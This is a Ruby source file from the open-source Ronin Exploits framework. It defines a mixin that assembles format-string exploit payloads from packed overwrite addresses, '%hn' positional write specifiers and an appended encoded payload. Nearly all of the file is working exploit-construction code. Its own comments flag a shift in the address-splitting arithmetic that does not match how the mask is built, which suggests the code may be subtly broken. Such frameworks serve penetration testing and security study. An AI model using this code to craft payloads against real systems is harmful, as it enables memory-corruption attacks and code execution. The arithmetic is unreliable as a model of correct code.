#
#--
# Ronin Exploits - A Ruby library for Ronin that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#++
#

require 'ronin/exploits/targets/format_string'
require 'ronin/exploits/helpers/binary'

module Ronin
  module Exploits
    module Helpers
      #
      # Mixin for exploits whose payload is delivered through a format
      # string. It pulls in Helpers::Binary, declares a +targets+
      # association of Targets::FormatString records, and supplies the
      # default +build+ step that assembles the string and stores it in
      # +@format_string+.
      #
      module FormatString
        #
        # Hook run when this module is included into a class.
        #
        # Mixes Helpers::Binary into _base_, declares the +targets+
        # association (DataMapper-style +has n+) with the class name of
        # Targets::FormatString, and exposes the last built string via
        # +format_string+.
        #
        def self.included(base)
          base.module_eval do
            include Ronin::Exploits::Helpers::Binary

            has n, :targets, :class_name => 'Ronin::Exploits::Targets::FormatString'

            # The built format string
            attr_reader :format_string
          end
        end

        #
        # Hook run when this module extends a single object.
        #
        # Extends _obj_ with Helpers::Binary and defines a singleton
        # +format_string+ reader on it; this is the per-object
        # counterpart of the +attr_reader+ declared in +included+.
        #
        def self.extended(obj)
          obj.instance_eval do
            extend Ronin::Exploits::Helpers::Binary

            #
            # Returns the format string of the exploit.
            #
            def format_string
              @format_string
            end
          end
        end

        #
        # Adds a new Targets::FormatString with the given _attributes_
        # and _block_.
        #
        # _attributes_ and _block_ are passed straight through to
        # Targets::FormatString.new; the new target is appended to
        # +self.targets+ and the result of that +<<+ is returned.
        #
        def targeting(attributes={},&block)
          self.targets << Targets::FormatString.new(attributes,&block)
        end

        protected

        #
        # Builds a format string using the current target and payload to
        # be used in the format string exploit.
        #
        # Reads +target.overwrite+, +target.address+, +target.pop_length+
        # and +target.arch.address_length+ from the current target.
        # +verify_target!+, +pack+, +target+ and +encoded_payload+ are not
        # defined in this file and are expected from the including
        # exploit (presumably Helpers::Binary and the exploit base class;
        # verify against those). Propagates whatever +verify_target!+
        # raises when no usable target is set.
        #
        # Returns a String made of, in order: the two packed addresses,
        # two precision/positional write specifiers, and +encoded_payload+.
        #
        def build_format_string
          verify_target!

          # Two packed addresses: the overwrite address and the address
          # address_length/2 bytes past it.
          buffer = pack(target.overwrite) + pack(target.overwrite + (target.arch.address_length / 2))

          # low_mask starts as a single 0xff byte and gains one more byte
          # per iteration, so after the loop it is (address_length/2)+1
          # bytes wide.
          low_mask = 0xff
          (target.arch.address_length/2).times do
            low_mask <<= 8
            low_mask |= 0xff
          end

          # high_mask is low_mask shifted up by address_length*4 bits.
          high_mask = low_mask << (target.arch.address_length*4)

          # The high half is shifted back down by address_length/2 bits
          # (note: not by the address_length*4 used to build high_mask);
          # the low half is simply masked.
          high = (target.address & high_mask) >> (target.arch.address_length/2)
          low = target.address & low_mask

          # The smaller value is written first so the second precision
          # (the difference) is non-negative. address_length*2 is
          # subtracted from the first value before it is used as a
          # precision — presumably to account for the bytes already
          # emitted by the two packed addresses; confirm against +pack+.
          # Each specifier pair is "%.<precision>d%<index>$hn", where the
          # index is pop_length for the low half and pop_length+1 for the
          # high half.
          if low < high
            low -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
          else
            high -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
          end

          # Appends in place; buffer is a fresh String built above, so no
          # caller-visible object is mutated.
          buffer << encoded_payload
          return buffer
        end

        #
        # The default builder method, simply calls build_format_string.
        #
        # Stores the result in +@format_string+, which the +format_string+
        # reader exposes, and returns it.
        #
        def build
          @format_string = build_format_string
        end
      end
    end
  end
end